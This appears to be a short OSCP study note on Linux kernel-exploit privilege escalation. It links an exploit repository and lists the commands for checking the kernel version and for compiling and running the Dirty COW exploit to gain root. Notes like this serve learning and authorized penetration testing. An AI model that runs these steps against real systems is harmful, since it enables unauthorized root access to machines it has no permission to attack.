// notes/ PrivEsc — Linux
🐧

Kernel Exploits

The Kernel is essentially a computer program that controls everything in the system. It facilitates the interactions between hardware and software components. If we exploit the Ke…

#linux privilege escalation#adot8
source · oscp.adot8.com · linux-privilege-escalation/kernel-exploits

Kernel Exploits

Overview

The Kernel is essentially a computer program that controls everything in the system. It facilitates the interactions between hardware and software components. If we exploit the Kernel (system/core) we become the Kernel >:)

{% embed url="https://github.com/lucyoa/kernel-exploits" %}

Kernel version

code
01uname -a
02Linux debian 2.6.32-5-amd64

{% hint style="info" %} Use the linux-exploit-suggester to identify kernel exploits quickly {% endhint %}

Dirty COW

Compile

code
01gcc -pthread dirty.c -o c0w

Upload and run

code
01./c0w
02passwd
<figure><img src="/files/eNsuWXUDSTsQnrJgAku4" alt=""><figcaption></figcaption></figure>